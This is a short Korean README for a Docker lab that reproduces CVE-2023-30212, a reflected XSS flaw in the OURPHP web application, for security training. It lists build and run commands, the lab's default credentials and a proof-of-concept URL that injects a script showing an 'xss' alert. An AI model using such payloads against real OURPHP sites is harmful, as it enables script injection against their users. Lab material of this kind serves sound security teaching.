
CVE-2023-30212 악용 연습을 위한 Docker 기반 취약한 환경으로, 반사형 XSS 취약점이 있는 OURPHP 웹 앱을 포함하여 보안 교육을 제공합니다.
git clone https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-.git
이제 docker 이미지를 설정합니다.
다음 명령어를 사용하세요 sudo docker build -t work .
다음 명령어를 사용하세요 sudo docker run -d -p 80:80 work
이제 컨테이너 ID를 얻게 됩니다.
브라우저로 이동하여 localhost를 검색하세요 ; 127.0.0.1
이제 자격 증명을 사용하세요.
사용자 이름 : root
비밀번호 : docker
데이터베이스 : work
사용자 이름 : work 비밀번호 : work
다음 URL로 이동하세요 http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
"xss"라는 알림 메시지가 표시됩니다.